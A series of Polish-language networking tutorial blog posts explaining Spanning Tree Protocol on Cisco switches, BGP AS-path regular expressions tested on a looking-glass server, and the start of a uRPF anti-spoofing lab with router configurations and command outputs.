RSNET.PL

Spanning Tree Protocol – podstawy

admin — Wed, 15 Aug 2018 22:13:46 +0000

Protokół drzewa rozpinającego (STP) został przedstawiony jako mechanizm przeciwdziałania pętlą w warstwie drugiej modelu ISO/OSI. STP używa mechanizmu, który polega na wyłączaniu redundantnych linków w celu uniknięcia pętli w sieci LAN. Gdyby nie STP pakiety rozgłoszeniowe (Broadcast) krążyły by w sieci w nieskończoność.

Załóżmy, że mamy poniższą topologię sieci przedstawioną na rysunku poniżej.

PC-1 chcę się skomunikować z PC-2, załóżmy że na PC-1 wydamy komendę ping 192.168.0.2. Host PC-1 nie zna adresu MAC hosta PC-2, więc musi wysłać zapytanie ARP na adres rozgłoszeniowy. Ramka z tym zapytaniem trafia najpierw do switcha SW3, który przesyła ją do wszystkich swoich interfejsów (Gi0/0, Gi0/1), z wyjątkiem interfejsu z którego ta ramka przyszła (Gi0/2). Następnie ramka dociera do SW1 oraz do SW2. Oba te switche również przesyłają tą ramkę w taki sam sposób jak zrobił to SW3, czyli SW1 przesyła ramkę przez Gi0/1 w kierunku SW2, oraz przez Gi0/2 do PC-2, natomiast SW2 przesyła ramkę przez Gi0/0 w kierunku SW1. Host PC-2 otrzymał zapytanie ARP i może na nie odpowiedzieć, jednak ramka z zapytaniem dalej krąży pomiędzy SW1, SW2 i SW3 i będzie tak krążyć w nieskończoność. Jedynym sposobem na przerwanie tej pętli jest wyłączenie jednego z interfejsów pomiędzy switchami, w taki sposób żeby istniała tylko jedna ścieżka pomiędzy PC-1 a PC-2 i do tego właśnie celu służy protokół drzewa rozpinającego (Spanning Tree Protocol).

Domyślnie przełączniki Cisco mają uruchomiony protokół STP, natomiast dla celów zobrazowania co się stanie jak w sieci LAN powstanie pętla i ramki będą krążyć w nieskończoność wyłączymy STP na switchach w topologii przedstawionej powyżej. Sprawdźmy co się stanie z przełącznikami jak wyłaczymy STP i wykonamy ping z PC-1 na PC-2.

Do wyłączenia STP służy komenda:

SW(config)# no spanning-tree vlan 1

Wykonajmy ją na wszystkich trzech switchach:

SW1(config)# no spanning-tree vlan 1
SW2(config)# no spanning-tree vlan 1
SW3(config)# no spanning-tree vlan 1

Teraz wykonajmy ping z PC-1 i PC-2 i obserwujmy co się stanie. Switche SW1 i SW2 przestały odpowiadać na komendy, utylizacja procesora jest na bardzo wysokim poziomie, dlatego nie odpowiada konsola, dodatkowo jak uruchomimy wiresharka na jednym z interfejsów pomiędzy switchami to zobaczymy, że cały czas krążą w sieci pakiety broadcast:

Dodatkowo ping pomiędzy PC-1 a PC-2 nie działa, dostajemy timeout i jest to spowodowane pętlą w sieci. Wyłączmy teraz jeden z interfejsów switcha SW3 (Gi0/1) i zobaczmy jak będzie wyglądała sytuacja. Od razu po wyłączeniu interfejsu Gi0/1 możemy zaobserwować, że konsole na switchach zaczęły odpowiadać, oraz ping z PC-1 na PC-2 działa.

VPCS> ping 192.168.0.2
84 bytes from 192.168.0.2 icmp_seq=1 ttl=64 time=9.095 ms
84 bytes from 192.168.0.2 icmp_seq=2 ttl=64 time=15.457 ms
84 bytes from 192.168.0.2 icmp_seq=3 ttl=64 time=27.437 ms
84 bytes from 192.168.0.2 icmp_seq=4 ttl=64 time=12.474 ms
84 bytes from 192.168.0.2 icmp_seq=5 ttl=64 time=11.474 ms

Jak działa STP ?

Włączmy teraz spowrotem na switchach spanning-tree protocol oraz interfejs który wyłączyliśmy. W celu weryfikacji czy STP jest uruchomione możemy posłużyć się następującą komendą:

SW1#show spanning-tree

VLAN0001
Spanning tree enabled protocol ieee
Root ID    Priority 32769
           Address 00ca.0d3f.0c00
           Cost 4
           Port 1 (GigabitEthernet0/0)
           Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID  Priority 32769 (priority 32768 sys-id-ext 1)
           Address 00ca.0dc1.2f00
           Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
           Aging Time 300 sec

Interface Role Sts Cost Prio.Nbr Type
------------------- ---- --- --------- -------- --------------------------------
Gi0/0     Root FWD 4    128.1    P2p
Gi0/1     Altn BLK 4    128.2    P2p

SW2#show spanning-tree

VLAN0001
Spanning tree enabled protocol ieee
Root ID    Priority 32769
           Address 00ca.0d3f.0c00
           Cost 4
           Port 2 (GigabitEthernet0/1)
           Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID  Priority 32769 (priority 32768 sys-id-ext 1)
           Address 00ca.0d8e.9c00
           Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
           Aging Time 300 sec

Interface Role Sts Cost Prio.Nbr Type
------------------- ---- --- --------- -------- --------------------------------
Gi0/0     Desg FWD 4    128.1    P2p
Gi0/1     Root FWD 4    128.2    P2p
Gi0/2     Desg FWD 4    128.3    P2p

SW3#show spanning-tree

VLAN0001
Spanning tree enabled protocol ieee
Root ID    Priority 32769
           Address 00ca.0d3f.0c00
           This bridge is the root
           Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID  Priority 32769 (priority 32768 sys-id-ext 1)
           Address 00ca.0d3f.0c00
           Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
           Aging Time 300 sec

Interface Role Sts Cost Prio.Nbr Type
------------------- ---- --- --------- -------- --------------------------------
Gi0/0     Desg FWD 4    128.1    P2p
Gi0/1     Desg FWD 4    128.2    P2p
Gi0/2     Desg FWD 4    128.3    P2p

Protokół STP działa w oparciu o ramki BPDU (bridge protocol data unit). Switche wymieniają się tymi ramkami i na ich podstawie ustalają które nadmiarowe połączenia zablokować. Ramka BPDU wygląda następująco:

Najpierw na podstawie ramek BPDU wybierany jest korzeń drzewa (root bridge). Korzeń drzewa zostaje wybrany na podstawie Bridge Identifier, które składa się następujących pól:

Bridge Priority – priorytet przełacznika

Bridge System ID Extension – vlan dla którego działa STP

Bridge System ID – MAC adres przełącznika

Root Bridge zostaje switch który posiada najmniejszy priorytet, w przypadku gdy priorytety są takie same to korzeniem zostaje przełącznik o najniższym adresie MAC. W naszym przykładzie Root Bridge został wybrany switch SW3, ponieważ posiada najniższy MAC adres (priorytety na wszystkich switchach są takie same)

SW1 Bridge ID 
Priority 32769 (priority 32768 sys-id-ext 1) 
Address 00ca.0dc1.2f00

SW2 Bridge ID 
Priority 32769 (priority 32768 sys-id-ext 1)
Address 00ca.0d8e.9c00

SW3 Bridge ID
Priority 32769 (priority 32768 sys-id-ext 1)
Address 00ca.0d3f.0c00

Zweryfikujmy to wydając komendę show spanning-tree na SW3:

SW3#show spanning-tree

VLAN0001
Spanning tree enabled protocol ieee
Root ID Priority 32769
        Address 00ca.0d3f.0c00
        This bridge is the root
        Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID Priority 32769 (priority 32768 sys-id-ext 1)
          Address 00ca.0d3f.0c00
          Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
          Aging Time 300 sec

Interface Role Sts Cost Prio.Nbr Type
------------------- ---- --- --------- -------- --------------------------------
Gi0/0     Desg FWD 4    128.1    P2p
Gi0/1     Desg FWD 4    128.2    P2p
Gi0/2     Desg FWD 4    128.3    P2p

Następny krok po wybraniu root bridge to ustawienie portów przełączników w odpowiedniej roli. Role portów w STP są trzy: Designated, Root, Alternate. Porty Designated i Root przesyłają ruch, natomiast porty Alternate są zablokowane tak aby nie powstała pętla. Porty Root są to porty które prowadzą do Root Bridge’a, natomiast porty Designated to porty które prowadzą do innych przełączników. Wszystkie porty root bridge są portami Designated:

Następnie pozostałe przełączniki wybierają porty Root i Designated, które wybierane są zgodnie z poniższym algorytmem:

1. Najniższy root bridge ID

2. Najniższy koszt ścieżki do root bridge

3. Najniższy bridge ID

4. Najniższy port ID (nadawcy).

Port ID składa się z priorytetu i numeru interfejsu. W wyniku polecenia show spanning-tree jest to pole Prio.Nbr.

Pierwszy punkt możemy ominąć, ponieważ ma on zastosowanie tylko dla portów Root Bridge’a. Kolejny punkt to najniższy koszt ścieżki do root bridge. Domyślnie koszty portów wyglądają następująco:

Pasmo	Koszt
10 Mbps	100
100 Mbps	19
1-Gigabit Ethernet	4
10-Gigabit Ethernet	2

W naszej topologii mamy interfejsy Gigabitowe więc koszty poszczególnych linków wynoszą 4:

Dla SW1 koszt ścieżki do Root Bridge przez Gi0/0 wynosi 4, natomiast przez Gi0/1 wynosi 4+4 czyli 8. W związku z tym Gi0/0 zostanie Root Port.

Dla SW2 koszt ścieżki do Root Bridge przez Gi0/0 wynosi 4 +4 czyli 8, natomiast przez Gi0/1 wynosi 4. W związku z tym Gi0/1 zostanie Root Port.

Ostatni krok to wybór portu Designated i portu Alternate. W obu przypadkach zarówno port Gi0/1 na SW1 oraz Gi0/0 na SW2 mają ten sam koszt ścieżki do Root Bridge, dlatego musimy wziąć następny punkt algorytmu wyboru, czyli punkt 3. Najniższy bridge ID. Dla przypomnienia Bridge ID SW1 = 32769 + 00ca.0dc1.2f00, a Bridge ID SW2 = 32769 + 00ca.0d8e.9c00. Priorytet w obu przypadkach jest taki sam, czyli niższy Bridge ID jest ustalany a podstawie niższego adresu MAC, w tym przypadku SW2 ma niższy Bridge ID, czyli port Gi0/0 na SW2 zostanie portem Designated, a port Gi0/1 na switchu SW1 zostanie zablokowany, czyli będzie pełnił rolę Alternate.

Zweryfikujmy stan portów korzystając z komendy show spanning-tree.

SW1#show spanning-tree

VLAN0001
Spanning tree enabled protocol ieee
Root ID    Priority 32769
           Address 00ca.0d3f.0c00
           Cost 4
           Port 1 (GigabitEthernet0/0)
           Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID  Priority 32769 (priority 32768 sys-id-ext 1)
           Address 00ca.0dc1.2f00
           Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
           Aging Time 300 sec

Interface Role Sts Cost Prio.Nbr Type
------------------- ---- --- --------- -------- --------------------------------
Gi0/0     Root FWD 4    128.1    P2p
Gi0/1     Altn BLK 4    128.2    P2p

SW2#show spanning-tree

VLAN0001
Spanning tree enabled protocol ieee
Root ID    Priority 32769
           Address 00ca.0d3f.0c00
           Cost 4
           Port 2 (GigabitEthernet0/1)
           Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID  Priority 32769 (priority 32768 sys-id-ext 1)
           Address 00ca.0d8e.9c00
           Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
           Aging Time 300 sec

Interface Role Sts Cost Prio.Nbr Type
------------------- ---- --- --------- -------- --------------------------------
Gi0/0     Desg FWD 4    128.1    P2p
Gi0/1     Root FWD 4    128.2    P2p

SW3#show spanning-tree

VLAN0001
Spanning tree enabled protocol ieee
Root ID    Priority 32769
           Address 00ca.0d3f.0c00
           This bridge is the root
           Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID  Priority 32769 (priority 32768 sys-id-ext 1)
           Address 00ca.0d3f.0c00
           Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
           Aging Time 300 sec

Interface Role Sts Cost Prio.Nbr Type
------------------- ---- --- --------- -------- --------------------------------
Gi0/0     Desg FWD 4    128.1    P2p
Gi0/1     Desg FWD 4    128.2    P2p

Każdy z portów w STP może być w jednym z poniższych stanów:

Disabled – port jest wyłączony administracyjnie (shutdown) i nie bierze udziału w procesie STP

Blocking – jest to początkowy stan portu, który trwa przez 20 sekund, po tym czasie port przechodzi do stanu Listening. Jeśli port nie jest portem Designated ani Root, czyli jest portem Alternate to również będzie w stanie blocking i w nim pozostanie dopóki nie zostanie zmieniona topologia sieci. Port w stanie blocking nie uczestniczy w procesie przesyłania ramek.

Listening – tylko designated i root port może przejść w stan nasłuchiwania. W tym stanie switch próbuje dowiedzieć się jak wygląda topologia. Port w stanie listening przesyła tylko ramki BPDU, ramki z danymi nie są przesyłane, po 15 sekundach w stanie listening port przechodzi w stan learning.

Learning – w tym stanie port uczy się adresów MAC poprzez analizowanie adresów źródłowych ramek ethernetowych otrzymanych na porcie. Port uczy się adresów przez 15 sekund, a następnie przechodzi w stan przesyłania ramek (Forwarding)

Forwarding – jest to finalny stan portu, w którym następuje przesyłanie ramek z danymi.

STP przydatne komendy:

Zmiana Root Bridge

Zmianę root bridge’a możemy wykonać na dwa sposoby. Automatycznie i ręcznie.

SW1(config)#spanning-tree vlan 1 root primary

Powyższa komenda zmieni priorytet przełącznika (bridge priority) na wartość niższą niż priorytet obecnego root bridge’a.

SW1#show spanning-tree

VLAN0001
Spanning tree enabled protocol ieee
Root ID     Priority 24577
            Address  00ca.0dc1.2f00
            This bridge is the root
            Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID   Priority 24577 (priority 24576 sys-id-ext 1)
            Address  00ca.0dc1.2f00
            Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
            Aging Time 15 sec

Interface Role Sts Cost Prio.Nbr Type
------------------- ---- --- --------- -------- --------------------------------
Gi0/0     Desg FWD 4    128.1    P2p
Gi0/1     Desg FWD 4    128.2    P2p

Ręczną zmianę priorytetu możem wykonać następująca komendą:

SW1(config)#spanning-tree vlan 1 priority 4096

SW1#show spanning-tree

VLAN0001
Spanning tree enabled protocol ieee
Root ID       Priority  4097
              Address   00ca.0dc1.2f00
              This bridge is the root
              Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID     Priority  4097 (priority 4096 sys-id-ext 1)
              Address   00ca.0dc1.2f00
              Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
              Aging Time 300 sec

Interface Role Sts  Cost  Prio.Nbr Type
------------------- ---- --- --------- -------- --------------------------------
Gi0/0     Desg FWD  4     128.1    P2p
Gi0/1     Desg FWD  4     128.2    P2p

Zmiana kosztu intefejsu:

SW1(config-if)#spanning-tree cost 100

SW1#show spanning-tree

VLAN0001
Spanning tree enabled protocol ieee
Root ID       Priority  4097
              Address   00ca.0dc1.2f00
              This bridge is the root
              Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec

Bridge ID    Priority   4097 (priority 4096 sys-id-ext 1)
             Address    00ca.0dc1.2f00
             Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec
             Aging Time 300 sec

Interface Role Sts  Cost  Prio.Nbr Type
------------------- ---- --- --------- -------- --------------------------------
Gi0/0     Desg FWD   100  128.1    P2p
Gi0/1     Desg FWD   4    128.2    P2p

BGP – wyrażenia regularne

admin — Tue, 31 Jul 2018 17:32:43 +0000

Wyrażenia regularne bardzo często przydają się w manipulacji trasami BGP, oraz przeszukiwaniu tablicy BGP po atrybucie AS-Path. Do sprawadzenia w praktyce wykorzystania wyrażeń regularnych skorzystamy z jednego z dostępnych serwerów Looking Glass. Ja wybrałem serwer Looking Glass: https://www.as13030.net/looking-glass.php

Po wejściu na powyższy serwer możemy wybrać Router (domyślnie Router: RR Zurich (AS13030)), typ zapytania Request: show ip bgp regexp, oraz ustawić argumenty, w naszym przypadku będą to wyrażenia regularne.

1. Wyświetlenie wszystkich podsieci pochodzących tylko z AS4788

show ip bgp regexp ^4788$

BGP table version is 0, local router ID is 213.144.129.123
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

Network          Next Hop            Metric LocPrf Weight Path
*>i1.32.0.0/19      213.144.128.173          2    150      0 4788 i
*>i1.32.32.0/19     213.144.128.173          2    150      0 4788 i
*>i23.6.120.0/24    213.144.128.173          2    150      0 4788 i
*>i23.212.55.0/24   213.144.128.173          2    150      0 4788 i
*>i103.4.140.0/22   213.144.128.221          2    150      0 4788 i
*>i137.195.224.0/20 213.144.128.173          2    150      0 4788 i
*>i210.195.0.0/19   213.144.128.173          2    150      0 4788 ?
*>i210.195.32.0/19  213.144.128.173          2    150      0 4788 ?
*>i210.195.64.0/19  213.144.128.173          2    150      0 4788 ?
*>i210.195.96.0/19  213.144.128.173          2    150      0 4788 ?
*>i210.195.128.0/19 213.144.128.173          2    150      0 4788 ?
*>i210.195.160.0/19 213.144.128.173          2    150      0 4788 ?
*>i210.195.192.0/19 213.144.128.173          2    150      0 4788 ?
*>i210.195.224.0/19 213.144.128.173          2    150      0 4788 ?
*>i218.208.160.0/19 213.144.128.173          2    150      0 4788 i
*>i219.93.2.0       213.144.128.173          2    150      0 4788 i
*>i219.95.64.0/20   213.144.128.173          2    150      0 4788 i
*>i219.95.104.0/21  213.144.128.173          2    150      0 4788 i
*>i219.95.136.0/21  213.144.128.173          2    150      0 4788 i

Total number of prefixes 19

2. Wyświetlenie wszystkich podsieci pochodzących z AS4788, ale mogących przechodzić przez inne ASy

show ip bgp regexp _4788$

BGP table version is 0, local router ID is 213.144.129.123
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

Network          Next Hop            Metric LocPrf Weight Path
*>i1.9.0.0/16       213.144.128.169          1    160      0 1273 4788 i
*>i1.32.0.0/17      213.144.128.169          1    160      0 1273 4788 i
*>i1.32.0.0/19      213.144.128.173          2    150      0 4788 i
*>i1.32.32.0/19     213.144.128.173          2    150      0 4788 i
*>i1.32.64.0/18     213.144.128.169          1    160      0 1273 4788 i
*>i23.6.120.0/24    213.144.128.173          2    150      0 4788 i
*>i23.13.192.0/20   213.144.128.169          1    160      0 1273 4788 i
*>i23.15.16.0/20    213.144.128.169          1    160      0 1273 4788 i
*>i23.51.32.0/20    213.144.128.169          1    160      0 1273 4788 i
*>i23.51.48.0/20    213.144.128.169          1    160      0 1273 4788 i
*>i23.197.60.0/23   213.144.128.169          1    160      0 1273 4788 i
*>i23.200.82.0/23   213.144.128.169          1    160      0 1273 4788 i
*>i23.201.156.0/22  213.144.128.169          1    160      0 1273 4788 i
...
Total number of prefixes 402

3. Wyświetlenie wszystkich podsieci przechodzących przez AS46887

show ip bgp regexp _46887_

BGP table version is 0, local router ID is 213.144.129.123
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

Network          Next Hop            Metric LocPrf Weight Path
*>i5.11.28.0/24     213.144.128.216          1    150      0 6939 46887 36614 42705 i
*>i5.61.116.0/23    213.144.128.216          1    150      0 6939 46887 199373 199373 199373 199373 199373 199373 199373 199373 199373 199373 i
*>i8.2.68.0/24      213.144.128.216          1    150      0 6939 46887 396835 i
*>i8.2.104.0/24     213.144.128.216          1    150      0 6939 46887 396487 396487 396487 396487 396487 i
*>i8.11.166.0/24    213.144.128.216          1    150      0 6939 46887 i
*>i8.14.103.0/24    213.144.128.216          1    150      0 6939 46887 13817 i
*>i8.14.121.0/24    213.144.128.216          1    150      0 6939 46887 12169 i
*>i8.22.101.0/24    213.144.128.216          1    150      0 6939 46887 12220 i
*>i8.28.55.0/24     213.144.128.216          1    150      0 6939 46887 394830 i
*>i8.33.72.0/24     213.144.128.216          1    150      0 6939 46887 17158 17158 17158 17158 i
*>i8.37.99.0/24     213.144.128.216          1    150      0 6939 46887 16491 i
*>i8.44.200.0/24    213.144.128.216          1    150      0 6939 46887 25611 25611 25611 25611 25611 25611 i
...
Total number of prefixes 1537

4. Wyświetlenie wszystkich podsieci, które są lokalnymi podsieciami routera

show ip bgp regexp ^$

BGP table version is 0, local router ID is 213.144.129.123
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

Network          Next Hop            Metric LocPrf Weight Path
*>i14.0.0.0         213.144.128.214          1     10      0 i
*>i27.0.0.0         213.144.128.214          1     10      0 i
*>i37.17.232.0/22   213.144.128.208          1    100      0 i
*>i37.17.236.0/23   213.144.128.208          1    100      0 i
*>i37.17.238.0/23   213.144.128.208          1    100      0 i
*>i46.28.203.155/32 213.144.128.177          1    100      0 i
*>i46.28.204.142/32 213.144.128.177          1    100      0 i
*>i77.109.128.0/18  213.144.128.208          1    100      0 i
*>i77.109.128.0/19  213.144.128.208          1    100      0 i
*>i77.109.128.2/32  77.109.129.61            3    100      0 i
...
Total number of prefixes 127

5. wyświetlenie wszystkich podsieci tylko z bezpośrednio połączonych ASów

show ip bgp ^[0-9]+$

BGP table version is 0, local router ID is 213.144.129.123
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

Network          Next Hop            Metric LocPrf Weight Path
*>i1.0.0.0/24       213.144.128.173          1    150      0 13335 i
*>i1.1.1.0/24       213.144.128.173          1    150      0 13335 i
*>i1.6.4.0/22       213.144.128.179          2    150      0 9583 i
*>i1.6.6.0/24       213.144.128.179          2    150      0 9583 i
*>i1.6.8.0/22       213.144.128.179          2    150      0 9583 i
*>i1.6.12.0/22      213.144.128.179          2    150      0 9583 i
*>i1.6.16.0/22      213.144.128.179          2    150      0 9583 i
*>i1.6.20.0/22      213.144.128.179          2    150      0 9583 i
*>i1.6.24.0/22      213.144.128.179          2    150      0 9583 i
*>i1.6.28.0/22      213.144.128.179          2    150      0 9583 i
*>i1.6.32.0/22      213.144.128.179          2    150      0 9583 i
*>i1.6.36.0/22      213.144.128.179          2    150      0 9583 i
*>i1.6.40.0/22      213.144.128.179          2    150      0 9583 i
...
Total number of prefixes 41787

6. Wyświetlenie wszystkich podsieci osiągalnych przez AS6939

show ip bgp regexp ^6939_

BGP table version is 0, local router ID is 213.144.129.123
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

Network          Next Hop            Metric LocPrf Weight Path
*>i1.0.4.0/22       213.144.128.216          1    150      0 6939 4826 38803 56203 i
*>i1.0.4.0/24       213.144.128.216          1    150      0 6939 4826 38803 56203 i
*>i1.0.5.0/24       213.144.128.216          1    150      0 6939 4826 38803 56203 i
*>i1.0.6.0/24       213.144.128.216          1    150      0 6939 4826 38803 56203 i
*>i1.0.7.0/24       213.144.128.216          1    150      0 6939 4826 38803 56203 i
*>i1.255.30.0/24    213.144.128.216          1    150      0 6939 63199 i
*>i2.16.36.0/24     213.144.128.216          1    150      0 6939 7545 7545 7545 7545 2764 12222 12222 i
*>i2.17.218.0/24    213.144.128.216          1    150      0 6939 7545 7545 7545 7545 2764 32787 i
*>i2.18.52.0/24     213.144.128.216          1    150      0 6939 4826 20940 33905 i
...
Total number of prefixes 36028

7. Wyświetlenie wszystkich podsieci

show ip bgp regexp .*

BGP table version is 0, local router ID is 213.144.129.123
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

Network          Next Hop            Metric LocPrf Weight Path
*>i1.0.0.0/24       213.144.128.173          1    150      0 13335 i
*>i1.0.4.0/22       213.144.128.216          1    150      0 6939 4826 38803 56203 i
*>i1.0.4.0/24       213.144.128.216          1    150      0 6939 4826 38803 56203 i
*>i1.0.5.0/24       213.144.128.216          1    150      0 6939 4826 38803 56203 i
*>i1.0.6.0/24       213.144.128.216          1    150      0 6939 4826 38803 56203 i
*>i1.0.7.0/24       213.144.128.216          1    150      0 6939 4826 38803 56203 i
*>i1.0.16.0/24      213.144.128.221          2    150      0 2497 2519 i
*>i1.0.64.0/18      213.144.128.221          2    150      0 2497 7670 18144 i
*>i1.0.128.0/17     213.144.128.203          1     60      0 1299 38040 23969 i
*>i1.0.128.0/18     213.144.128.203          1     60      0 1299 38040 23969 i
*>i1.0.128.0/19     213.144.128.203          1     60      0 1299 38040 23969 i
*>i1.0.128.0/24     213.144.128.203          1     60      0 1299 4809 38040 23969 ?
...
Total number of prefixes 695338

8. Wyświetlenie wszystkich podsieci które pochodzą z AS56201 i przechodzą przez AS18101

show ip bgp regexp 18101_56201$

BGP table version is 0, local router ID is 213.144.129.123
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

Network          Next Hop            Metric LocPrf Weight Path
*>i220.225.183.0    213.144.128.173          2    150      0 15412 18101 56201 i

Total number of prefixes 1

9. Wyświetlenie wszystkich podsieci które pochodzą z AS46164 lub z AS46163

show ip bgp regexp _46164$|_46163$

BGP table version is 0, local router ID is 213.144.129.123
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

Network          Next Hop            Metric LocPrf Weight Path
*>i4.23.88.0/24     213.144.128.184          1     60      0 1299 7018 46164 i
*>i4.23.89.0/24     213.144.128.184          1     60      0 1299 7018 46164 i
*>i4.23.92.0/23     213.144.128.184          1     60      0 1299 7018 46164 i
*>i107.117.80.0/20  213.144.128.184          1     60      0 1299 7018 46164 i
*>i107.239.64.0/20  213.144.128.184          1     60      0 1299 7018 46164 i
*>i107.250.192.0/19 213.144.128.184          1     60      0 1299 7018 46164 i
*>i107.250.224.0/19 213.144.128.184          1     60      0 1299 7018 46164 i
*>i141.160.4.0/22   213.144.128.203          1     60      0 1299 174 46163 i
*>i141.160.12.0/22  213.144.128.173          2    150      0 6461 1294 46163 i
*>i141.160.20.0/22  213.144.128.173          2    150      0 6461 1294 4616346163 46163 46163 46163 i
*>i141.160.25.0/24  213.144.128.203          1     60      0 1299 174 46163 i
*>i141.160.26.0/24  213.144.128.184          1     60      0 1299 7018 2687 46163 i
*>i141.160.27.0/24  213.144.128.203          1     60      0 1299 174 46163 i
*>i141.160.28.0/24  213.144.128.214          2    150      0 7473 3758 46163 i
*>i141.160.29.0/24  213.144.128.203          1     60      0 1299 174 46163 I
...
Total number of prefixes 47

10. Wyświetlenie wszystkich podsieci, których atrybut AS_Path posiada więcej niż raz AS396835, czyli gdzie została zastosowana technika AS Prepending

show ip bgp regexp (396835_){2,}

BGP table version is 0, local router ID is 213.144.129.123
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

Network          Next Hop            Metric LocPrf Weight Path
*>i140.102.0.0      213.144.128.216          1    150      0 6939 46887 396835 396835 396835 396835 i
*>i140.102.2.0/23   213.144.128.216          1    150      0 6939 46887 396835 396835 396835 396835 i
*>i192.80.85.0      213.144.128.216          1    150      0 6939 46887 396835 396835 396835 396835 i
*>i192.80.95.0      213.144.128.216          1    150      0 6939 46887 396835 396835 396835 396835 i
*>i192.138.225.0    213.144.128.216          1    150      0 6939 46887 396835 396835 396835 396835 i

Total number of prefixes 5

11. Wyświetlenie wszystkich podsieci, które pochodzą z ASów trzy cyfrowych zaczynających się od 1,2 lub 3.
np. 312 , 123, 223 itp

show ip bgp regexp _[123].{2}$

BGP table version is 0, local router ID is 213.144.129.123
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal,
r RIB-failure, S Stale, R Removed
Origin codes: i - IGP, e - EGP, ? - incomplete

Network          Next Hop            Metric LocPrf Weight Path
*>i5.157.72.0/21    213.144.128.203          1     60      0 1299 174 i
*>i5.158.83.0/24    213.144.128.203          1     60      0 1299 174 i
*>i5.178.16.0/21    213.144.128.203          1     60      0 1299 3257 260 i
*>i6.64.164.0/23    213.144.128.184          1     60      0 1299 209 721 27064 367 i
*>i8.25.217.0/24    213.144.128.173          2    150      0 6461 54756 100 i
*>i8.27.160.0/24    213.144.128.184          1     60      0 1299 209 i
*>i8.27.167.0/24    213.144.128.184          1     60      0 1299 209 i
*>i8.28.178.0/23    213.144.128.216          1    150      0 6939 2381 2381 103 i
*>i8.30.248.0/22    213.144.128.216          1    150      0 6939 2381 2381 103 i
...
Total number of prefixes 6168

URPF – Unicast Reverse Path Forwarding

admin — Sun, 29 Jul 2018 10:59:47 +0000

Unicast Reverse Path Forwarding (uRPF) – jest to technika stosowana w routerach Cisco (oraz u innych producentów), która umożliwia sprawdzenie czy źródło pakietu IP jest osiągalne przez tablice routingu. Zapobiega to fałszowaniu adresów IP (IP spoofing). uRFP może działać w dwóch trybach: „ścisłym” i „luźnym”

– strict mode

– loose mode

STRICT MODE

W trybie ścisłym router sprawdza czy źródłowy adres ip pakietu otrzymanego na danym interfejsie, jest osiągalny przez router na postawie tablicy CEF FIB przez interfejs z którego przyszedł pakiet, jeśli nie to pakiet jest odrzucany.

LOOSE MODE

W trybie luźnym w przeciwieństwie do trybu ścisłego router sprawdza czy źródłowy adres ip pakietu otrzymanego na danym interfejsie jest osiągalny przez router na podstawie tablicy CEF FIB przez jakikolwiek z jego interfejsów.

PRZYKŁAD:

W celu zademonstrowania działania mechanizmu uRPF w routerach CISCO posłużę się następując topologią zbudowaną w GNS3

Konfiguracja wygląda następująco:

interface FastEthernet0/0
  ip address 192.168.12.1 255.255.255.0
  ip verify unicast source reachable-via rx
  duplex full
!
interface FastEthernet1/0
  ip address 192.168.13.1 255.255.255.0
  duplex full
!
router ospf 1
  network 192.168.0.0 0.0.255.255 area 0

interface Loopback0
  ip address 3.3.3.3 255.255.255.255
!
interface FastEthernet0/0
  ip address 192.168.12.2 255.255.255.0
  duplex full
!
interface FastEthernet1/0
  ip address 192.168.23.2 255.255.255.0
  duplex full
!
router ospf 1
  network 192.168.0.0 0.0.255.255 area 0

interface Loopback0
  ip address 3.3.3.3 255.255.255.255
!
interface FastEthernet0/0
  ip address 192.168.13.3 255.255.255.0
  duplex full
!
interface FastEthernet1/0
  ip address 192.168.23.3 255.255.255.0
  duplex full
!
router ospf 1
  network 3.3.3.3 0.0.0.0 area 0
  network 192.168.0.0 0.0.255.255 area 0

Sprawdźmy teraz jak wygląda tablica routingu na routerze R1.

R1# show ip route

      3.0.0.0/32 is subnetted, 1 subnets
O        3.3.3.3 [110/2] via 192.168.13.3, 00:06:01, FastEthernet1/0
      192.168.12.0/24 is variably subnetted, 2 subnets, 2 masks
C        192.168.12.0/24 is directly connected, FastEthernet0/0
